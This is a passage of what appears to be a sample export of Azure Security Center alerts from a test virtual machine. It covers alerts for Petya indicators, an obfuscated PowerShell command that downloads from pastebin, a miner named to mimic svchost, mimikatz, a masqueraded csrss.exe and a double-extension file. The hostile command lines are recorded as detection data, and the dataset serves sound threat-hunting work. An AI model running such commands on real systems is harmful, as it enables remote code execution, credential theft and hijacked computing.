""Suspicious Command Line"": ""asc_alerttest_662jfi039n.exe -foo"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x570"",
""Arguments Auditing Enabled"": ""true"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""asc_alerttest_662jfi039n.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x570"",
""CommandLine"": ""asc_alerttest_662jfi039n.exe -foo"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:05.4079619Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:05.4079619Z"",
""EndTimeUtc"": ""2019-01-15T11:45:05.4079619Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:13,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
150,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:06,2019-01-15 11:45:06,91a4f9a7-70ad-433b-a568-34314e3f467f,2518547480938543829_91a4f9a7-70ad-433b-a568-34314e3f467f,Detection,Microsoft,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Analysis of host data on MSTICALERTSWIN1 detected indicators associated with Petya ransomware. See https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/ for more information. Review the commandline associated in this alert and escalate this alert to your security team.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo rundll32.exe perfc.dat"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x16f4"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Petya\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Petya.pdf?sv=2018-03-28&sr=b&sig=bmxpe8CeqqzreQFf4BQaU6v9CPzAiouO%2F8xIaJUIHeU%3D&spr=https&st=2019-01-14T20:16:14Z&se=2019-04-14T20:31:14Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=0c8d0493-55c3-4b3f-a0b0-c8d4d2ce0343\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x16f4"",
""CommandLine"": ""cmd /c echo rundll32.exe perfc.dat"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:06.145617Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:06.145617Z"",
""EndTimeUtc"": ""2019-01-15T11:45:06.145617Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:13,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
151,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,adfabbe0-fce0-44f3-be4b-17283bd03bed,2518547480982511513_adfabbe0-fce0-44f3-be4b-17283bd03bed,Detection,Microsoft,Detected obfuscated command line.,Detected obfuscated command line.,Detected obfuscated command line.,Attackers use increasingly complex obfuscation techniques to evade detections that run against the underlying data. Analysis of host data on MSTICALERTSWIN1 detected suspicious indicators of obfuscation on the commandline.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xbc8"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xbc8"",
""CommandLine"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.7488486Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.7488486Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.7488486Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
152,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:10,2019-01-15 13:15:10,171b74b2-a431-4b55-8d69-128e5fb95329,2518547426892072407_171b74b2-a431-4b55-8d69-128e5fb95329,Detection,Microsoft,Suspiciously named process detected,Suspiciously named process detected,Suspiciously named process detected,Analysis of host data on MSTICALERTSWIN1 detected a process whose name is very similar to but different from a very commonly run process (svchost). While this process could be benign attackers are known to sometimes hide in plain sight by naming their malicious tools to resemble legitimate process names.,High,False,"{
""Account Session Id"": ""0x1794e44"",
""Compromised Host"": ""MSTICALERTSWIN1"",
""Parent Process"": ""cmd.exe"",
""Process Id"": ""0x1600"",
""Similar To Process Name"": ""svchost"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\suchost.exe"",
""Suspicious Process Name"": ""suchost.exe"",
""User Name"": ""MSTICAlertsWin1\\MSTICAdmin"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""2"",
""HostName"": ""msticalertswin1"",
""AzureID"": ""/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1"",
""OMSAgentID"": ""46fe7078-61bb-4bed-9430-7ac01d91c273"",
""Type"": ""host""
},
{
""$id"": ""3"",
""Name"": ""msticadmin"",
""NTDomain"": ""msticalertswin1"",
""Host"": {
""$ref"": ""2""
},
""IsDomainJoined"": false,
""Type"": ""account""
},
{
""$id"": ""4"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:10.7927592Z"",
""EndTimeUtc"": ""2019-01-15T13:15:10.7927592Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""2""
},
""Account"": {
""$ref"": ""3""
}
},
{
""$id"": ""5"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ImageFile"": {
""$ref"": ""5""
},
""Account"": {
""$ref"": ""3""
},
""Host"": {
""$ref"": ""2""
},
""Type"": ""process""
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:13,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
153,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:14,2019-01-15 13:15:14,89d1850f-dccd-4d45-b194-650819d358d9,2518547426859453218_89d1850f-dccd-4d45-b194-650819d358d9,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,"Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\mimikatz.exe' was running on the machine, often associated with attacker attempts to access credentials.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\mimikatz.exe"",
""Suspicious Command Line"": "".\\mimikatz.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1bd0"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""mimikatz.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1bd0"",
""CommandLine"": "".\\mimikatz.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:14.0546781Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:14.0546781Z"",
""EndTimeUtc"": ""2019-01-15T13:15:14.0546781Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:16,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
154,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:14,2019-01-15 13:15:14,51b74398-40e2-4b1b-9d92-89c0004738c9,2518547426858055460_51b74398-40e2-4b1b-9d92-89c0004738c9,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1220"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1220"",
""CommandLine"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:14.1944539Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:14.1944539Z"",
""EndTimeUtc"": ""2019-01-15T13:15:14.1944539Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:16,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
155,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:13,2019-01-15 13:15:13,75495c57-4fd6-4e27-b94c-c6f81f78bcb5,2518547426863814510_75495c57-4fd6-4e27-b94c-c6f81f78bcb5,Detection,Microsoft,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,"Analysis of host data on MSTICALERTSWIN1 detected an attempted WindowPosition registry configuration change that could be indicative of hiding application windows in non-visible sections of the desktop. This could be legitimate activity, or an indication of a compromised machine: this type of activity has been previously associated with known adware (or unwanted software) such as Win32/OneSystemCare and Win32/SystemHealer and malware such as Win32/Creprote. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00, corresponding to X-axis=0c00 and the Y-axis=0c00) this places the console app's window in a non-visible section of the user's screen in an area that is hidden from view below the visible start menu/taskbar. Known suspect Hex value includes, but not limited to c000c000",Low,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1b28"",
""Hex Value set for WindowPosition"": ""200007c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1b28"",
""CommandLine"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:13.6185489Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""Hive"": ""HKEY_CURRENT_USER"",
""Key"": ""console"",
""Type"": ""registry-key""
},
{
""$id"": ""11"",
""Key"": {
""$ref"": ""10""
},
""ValueType"": ""Unknown"",
""Type"": ""registry-value""
},
{
""$id"": ""12"",
""Key"": {
""$ref"": ""10""
},
""Name"": ""windowposition"",
""Value"": ""System.Byte[]"",
""ValueType"": ""DWord"",
""Type"": ""registry-value""
},
{
""$id"": ""13"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:13.6185489Z"",
""EndTimeUtc"": ""2019-01-15T13:15:13.6185489Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:16,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
156,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:13,2019-01-15 13:15:13,184c075e-64ee-4901-bc37-6eb999e81a11,2518547426862437699_184c075e-64ee-4901-bc37-6eb999e81a11,Detection,Microsoft,Suspicious system process executed,Suspicious system process executed,Suspicious system process executed,The system process c:\windows\fonts\csrss.exe was observed running in an abnormal context. Malware often use this process name to masquerade its malicious activity.,Medium,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\fonts\\csrss.exe"",
""command line"": ""c:\\windows\\fonts\\csrss.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1b5c"",
""account logon id"": ""0x1794e44"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xe04"",
""System Process"": ""CSRSS.EXE"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1b5c"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:13.75623Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:13.75623Z"",
""EndTimeUtc"": ""2019-01-15T13:15:13.75623Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:16,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
157,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:16,2019-01-15 13:15:16,7b30c978-28d5-4a28-a4c2-0985f08ab1c6,2518547426833838523_7b30c978-28d5-4a28-a4c2-0985f08ab1c6,Detection,Microsoft,Suspicious double extension file executed,Suspicious double extension file executed,Suspicious double extension file executed,"Analysis of host data indicates an execution of a process with a suspicious double extension.
This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x188c"",
""account logon id"": ""0x1794e44"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xe04"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious Double Extensions\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-Double-Extensions.pdf?sv=2018-03-28&sr=b&sig=hfaFk1Af%2FV1JdophFihpY1PS%2BcpjxIbptNyVi%2Fm4S4s%3D&spr=https&st=2019-01-15T11:52:55Z&se=2019-04-15T12:07:55Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=bdb7e59d-8ba8-4351-aa6d-eedc6b916aa5\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""doubleextension.pdf.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x188c"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:16.6161476Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
